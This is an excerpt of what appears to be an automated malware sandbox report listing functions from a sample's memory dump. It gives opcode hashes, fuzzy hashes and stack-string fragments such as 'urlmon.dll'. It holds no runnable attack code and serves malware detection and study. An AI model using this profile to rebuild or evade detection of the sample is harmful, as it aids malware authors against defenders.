                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 732cf41fa4367ee47cd14bea4e7c2690590d42ccf418e3fc3937c798628c859b
                                  • Instruction ID: 8c951849578ca28fc0918aa646b9aabbc9a23b7facbf7c354d2fd510effb7a6e
                                  • Opcode Fuzzy Hash: 732cf41fa4367ee47cd14bea4e7c2690590d42ccf418e3fc3937c798628c859b
                                  • Instruction Fuzzy Hash: AF3108B5A00248AFDB14DF99D885EDFB7B9EF88700F108119FD48AB344D775A811CBA5
                                  Function 03714FCE Relevance: .1, Instructions: 77COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7cf7d4a5a7cf83fb7cf31bce5d9a96618c6e73ab6c583951f5da0b79763ea305
                                  • Instruction ID: 724f8c135e66b2f594821bdd843c113678e1eaa6ea7eaee19c3680699903fa52
                                  • Opcode Fuzzy Hash: 7cf7d4a5a7cf83fb7cf31bce5d9a96618c6e73ab6c583951f5da0b79763ea305
                                  • Instruction Fuzzy Hash: A7214AB5A00308AFDB14DF98CC45EEFB7B9EF88710F004109FD18AB284D771A8218BA5
                                  Function 03703CAE Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d221e09c8ca47dafa74893f3d6aa27dee465712ac7322ec3ac639f6f55fd3738
                                  • Instruction ID: 42f2236e10b258a8f9daf6da9cd2a9679f9aded479b7ae087bac3bde1f895019
                                  • Opcode Fuzzy Hash: d221e09c8ca47dafa74893f3d6aa27dee465712ac7322ec3ac639f6f55fd3738
                                  • Instruction Fuzzy Hash: 7F1186763803057BF720DA599C43FAB775C9B89F21F244015FB04AF2C0E6A5F81156B4
                                  Function 0371433E Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e08f1b40d51c4fa8906e186afaa697256110811118bc5384eca26a538dab9da
                                  • Instruction ID: 21063310db83a19eb7ce07181abd31253c5b34c2a316295a080576c20f0e6da5
                                  • Opcode Fuzzy Hash: 7e08f1b40d51c4fa8906e186afaa697256110811118bc5384eca26a538dab9da
                                  • Instruction Fuzzy Hash: 69116076A01348AFD720EBA8CC45FEFB7BCEF88710F004549FA546B284E771A91187A5
                                  Function 037110BE Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 268360e6d5dae3dee57ec2d64a3d90c9378c9bd2b95fab2dd17d2ba609b5bacd
                                  • Instruction ID: f7b315a4fbaa0775bd3fe6fe30364c224d25e956e97f01d56025355838cbf415
                                  • Opcode Fuzzy Hash: 268360e6d5dae3dee57ec2d64a3d90c9378c9bd2b95fab2dd17d2ba609b5bacd
                                  • Instruction Fuzzy Hash: 2B2103B6D01219AF8B00DFA9D9409EFB7F9EF88210F14456EE919E7200E7705A05CFE0
                                  Function 0371449E Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b63602ec757a2835487765709a7b6045621a46dab860d58063d5b339089cbc5
                                  • Instruction ID: 762da8e02e69ee1c526df588d125b2dee6ead768bfee27643f5bb3edc2903ac0
                                  • Opcode Fuzzy Hash: 8b63602ec757a2835487765709a7b6045621a46dab860d58063d5b339089cbc5
                                  • Instruction Fuzzy Hash: 8911BF76A017486FD720EBA8CC45FEFB7BCEF84700F004549F958AB284E771A9118BA0
                                  Function 037123FE Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b266a29c805ea6cae8c6a2e1dbaa422ad074ce3ee38de5f05a4a4822d3349f2
                                  • Instruction ID: 1093c4419b6f8fb9351273f372c1265cfd961b7402b28b9486b4b457940acb90
                                  • Opcode Fuzzy Hash: 3b266a29c805ea6cae8c6a2e1dbaa422ad074ce3ee38de5f05a4a4822d3349f2
                                  • Instruction Fuzzy Hash: 84110AB6D0121CAF8B00DFA9DC409EEBBF9EF48210F14466EE909E7200E7715A148BA5
                                  Function 0370D38E Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c064da1e8d26660f3a4b95f4f60f5eb0a1f93cae81ea972cdf9a2943b9d78ad
                                  • Instruction ID: bd6b4db15c8166f6849b3885fe6dcc8f73ad3eee88ebce35ec4c85fcdf8597cc
                                  • Opcode Fuzzy Hash: 8c064da1e8d26660f3a4b95f4f60f5eb0a1f93cae81ea972cdf9a2943b9d78ad
                                  • Instruction Fuzzy Hash: F00184BBA013286BD714EB68DC49DEF736CDF48211F140255FD149B280FA70AE6186E1
                                  Function 0371532E Relevance: .0, Instructions: 47COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f8d39a70e7a326d00996aa242ebb41c312e8b420268ed862805266e53e42b436
                                  • Instruction ID: 112ec3aa975b0dc0e869d3f01273fae169f52de3954b59b269f2d9564fa173c0
                                  • Opcode Fuzzy Hash: f8d39a70e7a326d00996aa242ebb41c312e8b420268ed862805266e53e42b436
                                  • Instruction Fuzzy Hash: 730196B6204108BBDB54DF99DC81EDB77ADAF8C754F008608FA09E7241D671F8518BA4
                                  Function 0371102E Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 636ea438d664245b2df1dbabcf74092c1610cba3c9aaa36eae25e07fc8a6632e
                                  • Instruction ID: de0a009fca5f0c30eadf8973b8b30e5b4952a340c0dd69b2a851ecbad78862ab
                                  • Opcode Fuzzy Hash: 636ea438d664245b2df1dbabcf74092c1610cba3c9aaa36eae25e07fc8a6632e
                                  • Instruction Fuzzy Hash: A901EDB6C0121DAF8B41EFE9D9409EEBBF8AF08200F14816ED519F7200F77056048FA5
                                  Function 036F010E Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 048150da0851b6014c6761df76cc55df8a0567aa93a067310f03b6a1c90c017a
                                  • Instruction ID: bd975118444b1d510ee1a75c36de640bd8264a3045e830eec907cf4348c8f136
                                  • Opcode Fuzzy Hash: 048150da0851b6014c6761df76cc55df8a0567aa93a067310f03b6a1c90c017a
                                  • Instruction Fuzzy Hash: B3F0AE775102166BD710DB9DAC45B87FBDCEB45234F140122F91C97241D671D45187A0
                                  Function 0371459E Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea97bbaa504d2fd1a7a75a578015d1f83677b2ad14c3c5f0c0792d3583a52944
                                  • Instruction ID: 40cc41c734701a1b5a5f8f3d81547ed1755f728664ab8027e130d66e567bd42a
                                  • Opcode Fuzzy Hash: ea97bbaa504d2fd1a7a75a578015d1f83677b2ad14c3c5f0c0792d3583a52944
                                  • Instruction Fuzzy Hash: 9DF0F8762002087BDB50DE99DC85EDB77ADEF88650F004509BE189B241DA70B9618BB4
                                  Function 0371524E Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction ID: c37c0eaaeb80d826349a77d3ee13c6c3f287f78ed7bdf7e24d5938801ccfb7b4
                                  • Opcode Fuzzy Hash: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction Fuzzy Hash: 1EE06DBA2003087FD610EF58DC44EDB73ADEF85710F000008FD08A7241D770B9208AB4
                                  Function 036F0103 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 863d5771b3a32ee36451c4eaf0aeb48629d6fa879c2ff1f69770082ff01008b5
                                  • Instruction ID: d3045dfc41439278a90d8e5a48d737cd30966c52ea1eb49d42633cc9e3801c2e
                                  • Opcode Fuzzy Hash: 863d5771b3a32ee36451c4eaf0aeb48629d6fa879c2ff1f69770082ff01008b5
                                  • Instruction Fuzzy Hash: 34E020775142177BC7149BEE5C80983FFDDEA862303250321F55C9B251D531D45183E4
                                  Function 03703DCE Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88393d9b702a7e0893a0b3db55156c558a155649ec1ca7ab9ad45c238d5557a6
                                  • Instruction ID: 8a166e109ef84b1e387454b2a248f3731e7dfc4a22da86de25c0d979a86fe7e3
                                  • Opcode Fuzzy Hash: 88393d9b702a7e0893a0b3db55156c558a155649ec1ca7ab9ad45c238d5557a6
                                  • Instruction Fuzzy Hash: 44F01275815209EBDB24DF68D841BDDBBB8EB04320F2043A9E8259B2C0D63597549785
                                  Function 037170AE Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b01c90a70936b189f150aaefc9213e80cd1d92a6939f0f6270465fb773a0867f
                                  • Instruction ID: 78dbb735c4e3f1bbe6c85e6e466ade6fefcc719ff4bccc6c57ec04c87c996c3c
                                  • Opcode Fuzzy Hash: b01c90a70936b189f150aaefc9213e80cd1d92a6939f0f6270465fb773a0867f
                                  • Instruction Fuzzy Hash: D8E04F3760135827D324A69D9C09F9BB79C9BC5A60F198065FE08AB344E961E91042E5
                                  Function 03703DCB Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f17eb6d8425b444866fdd1b64cdf760659ae07f8411573838ee669ef71ede161
                                  • Instruction ID: cccb3dad9c77cd48187be76442ecd7b0d29e537943b15e6fbe01da50dbca88ac
                                  • Opcode Fuzzy Hash: f17eb6d8425b444866fdd1b64cdf760659ae07f8411573838ee669ef71ede161
                                  • Instruction Fuzzy Hash: 8BE09B75815108DBEB04DF64D841BDDBBB5DB04320F244369F828DB2C0D6399750D740
                                  Function 03714F2E Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction ID: 41c4a69477a429486479e7fa025f2a1c4d0f18e3e69b2038d7dfe877f91f3fd6
                                  • Opcode Fuzzy Hash: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction Fuzzy Hash: 42E0463A2003087BD620EA6DDC41EDB776EEFC5A54F004519FA08AB281C671B92186F0

                                  Non-executed Functions

                                  Function 036FFB8E Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                  • API String ID: 0-3248090998
                                  • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                  • Instruction ID: 1054837bcbc2f8f8a090c75e6ee4cd6b6ece8c6f0dc232e05eee57bc0f1aeb89
                                  • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                  • Instruction Fuzzy Hash: 9991FDF08052A98ECB118F55A5603DFBF71AB85204F1581E9C7AA7B243C3BE4E85DF90
                                  Function 0370E5DE Relevance: 34.0, Strings: 27, Instructions: 265COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                  • API String ID: 0-1002149817
                                  • Opcode ID: cc13ced45eeedd7abf4959586aa9ebefaa2c819b2eb37c4f83fbc7493a6cfccb
                                  • Instruction ID: 8b8766c008c20aa43d4896be3c1a709b23099008563d98b528ed193dc03b72a5
                                  • Opcode Fuzzy Hash: cc13ced45eeedd7abf4959586aa9ebefaa2c819b2eb37c4f83fbc7493a6cfccb
                                  • Instruction Fuzzy Hash: A4C11FB5C003589ADB65DFA4DC44BEEBBB9AF08704F1041DAE508BB241D7B54A88CF61
                                  Function 0370B49E Relevance: 25.2, Strings: 20, Instructions: 250COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                  • API String ID: 0-3236418099
                                  • Opcode ID: 266a40937d7274547532369bea3b2cb7bba8677afc8ef34faa133c9c18c125dc
                                  • Instruction ID: 92fe8ddf1e630281dd965cedc093784c280542b4410cc736a48395a75b976f85
                                  • Opcode Fuzzy Hash: 266a40937d7274547532369bea3b2cb7bba8677afc8ef34faa133c9c18c125dc
                                  • Instruction Fuzzy Hash: A09162B690031CAEDB20EF94CC45FEEB7BDEF44305F144199E508AA240EB759B998F61
                                  Function 0370B48F Relevance: 25.1, Strings: 20, Instructions: 98COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                  • API String ID: 0-3236418099
                                  • Opcode ID: 09f6b5ab0368632900df79df2ff23b411e4045e985765d47c6158df6661cdf6c
                                  • Instruction ID: aed13dd2b242926fda478276afd548b761a2c567fc2bba0eaeb2f51bb01fe9b0
                                  • Opcode Fuzzy Hash: 09f6b5ab0368632900df79df2ff23b411e4045e985765d47c6158df6661cdf6c
                                  • Instruction Fuzzy Hash: 8F4118B5D0035CDEEB20DFA58C48BEEBBB9BF04309F1081A9D508AB251D7B54A88CF51
                                  Function 036F642B Relevance: 21.4, Strings: 17, Instructions: 104COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %M$1p$2c$4$5$$6F$@$C$G$V$$W-$^0${v$}m$Q$g$r
                                  • API String ID: 0-2297339331
                                  • Opcode ID: e7a115f011d29ea2c87bea11ceaf9b3159ab5881c37114594776a90eb3a1be8f
                                  • Instruction ID: f6388a6b52e6e72d5d01d501df272cea68b85455110f651a34c7007e1da51797
                                  • Opcode Fuzzy Hash: e7a115f011d29ea2c87bea11ceaf9b3159ab5881c37114594776a90eb3a1be8f
                                  • Instruction Fuzzy Hash: B07136B0C05669CBEB20CF95C9987DEBBB1BB05308F1081D9C55C3B281D7BA1A89CF95
                                  Function 03706C4E Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                  • API String ID: 0-392141074
                                  • Opcode ID: cc758760f5755bf9cf70b9c01fa8ac02e9f892f4dcd8af27fd5838ae8c19c46a
                                  • Instruction ID: 278c526acdca0e8bbade43176b2ff08bca92742874e2ba6629cf88b7cdc7694d
                                  • Opcode Fuzzy Hash: cc758760f5755bf9cf70b9c01fa8ac02e9f892f4dcd8af27fd5838ae8c19c46a
                                  • Instruction Fuzzy Hash: 147161B6C10718AEDB15DFE4CC44FEEB7BCAF08705F048199E509AA150EB709B488FA5
                                  Function 03706C48 Relevance: 16.4, Strings: 13, Instructions: 177COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                  • API String ID: 0-392141074
                                  • Opcode ID: 1d5cbb8bea1c7b38827ed04cdd7ab354107af5182722fe8c8f12b1041d48b473
                                  • Instruction ID: d3096a1ffacbb51e67a213b685fb84d8bc10640e110fcb0b17524ec0a0baedc4
                                  • Opcode Fuzzy Hash: 1d5cbb8bea1c7b38827ed04cdd7ab354107af5182722fe8c8f12b1041d48b473
                                  • Instruction Fuzzy Hash: 62617FB6C10318AEDB15DFE4CC44FEEB7BDAF48305F108199E508AA190EB705B488FA5
                                  Function 036FA96E Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                  • API String ID: 0-685823316
                                  • Opcode ID: df1efaaa0d6adb2c50044a23d1529f91598081da1743713ae2cca052f047a118
                                  • Instruction ID: 6f66cc1a84e62eb2a831e3cbb78d2f9e22aa6417b4ca9bb91d7b91fe87917529
                                  • Opcode Fuzzy Hash: df1efaaa0d6adb2c50044a23d1529f91598081da1743713ae2cca052f047a118
                                  • Instruction Fuzzy Hash: 342173B5D5131CAADF54DFE4CC85BEEB7B9AF08700F10815DF608BA180DBB556488BA4
                                  Function 0370B95E Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                  • API String ID: 0-2304485323
                                  • Opcode ID: 7bb8ab171eab02b76f20ed4bb80a12da52012857c7a611af705c11e8302623f7
                                  • Instruction ID: c0561ab168c2229343d4216e8735004c7b54cb2fd51e7573d5303f031c0d37c3
                                  • Opcode Fuzzy Hash: 7bb8ab171eab02b76f20ed4bb80a12da52012857c7a611af705c11e8302623f7
                                  • Instruction Fuzzy Hash: 65D1E8B6900344ABDB14EFE4CC85FEEB7F8AF48700F544519E505AB240EB78EA55CBA1
                                  Function 03701DB9 Relevance: 10.1, Strings: 8, Instructions: 134COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$P$e$i$m$o$r$x
                                  • API String ID: 0-620024284
                                  • Opcode ID: ba1e2348fc902e6141eb998d62428fa372947ac09e993667f1e24ec89f269068
                                  • Instruction ID: e2c96321b297f69eeb8e08de8ccdbc136d171f071c250681156615549eabc251
                                  • Opcode Fuzzy Hash: ba1e2348fc902e6141eb998d62428fa372947ac09e993667f1e24ec89f269068
                                  • Instruction Fuzzy Hash: 0C41B87AC00318BADB25EFA4DC44FDE777CAF04700F1085DDA909AB140EAB597988FA0
                                  Function 03701DBE Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$P$e$i$m$o$r$x
                                  • API String ID: 0-620024284
                                  • Opcode ID: 17cf639cde16bf0f3c8110ba56b4036331b0c55f468c68b9666bdd98c361cfae
                                  • Instruction ID: 97f09f3008f06d913bfc64eb6b7b663ae812a684d1ab29adb12e8b23b8905b54
                                  • Opcode Fuzzy Hash: 17cf639cde16bf0f3c8110ba56b4036331b0c55f468c68b9666bdd98c361cfae
                                  • Instruction Fuzzy Hash: 9741A77AC10318BADB25EFA4DC44FDE777CAF54700F1085DDA509AB140EAB59B988FA0
                                  Function 0370EE3E Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: L$S$\$a$c$e$l
                                  • API String ID: 0-3322591375
                                  • Opcode ID: f1dd901b4b368ebe3ce50bfe9d942cbeb1a39445bf63da9c667fe2bbfea0cd66
                                  • Instruction ID: a040e0bfb20c4b5e4110285ac6067cbbdeb6a7ca6aacd8b4a54793795cf85279
                                  • Opcode Fuzzy Hash: f1dd901b4b368ebe3ce50bfe9d942cbeb1a39445bf63da9c667fe2bbfea0cd66
                                  • Instruction Fuzzy Hash: BA418776D00318EADB14EF98DC44FEEB7F8AF48300F05455AE919AB140E77195558BA0
                                  Function 03706A1E Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F$P$T$f$r$x
                                  • API String ID: 0-2523166886
                                  • Opcode ID: e1fbfb9a0e45314611f59fe07a5369dd2160a944b84a8f1ba64dfbd543cc00a8
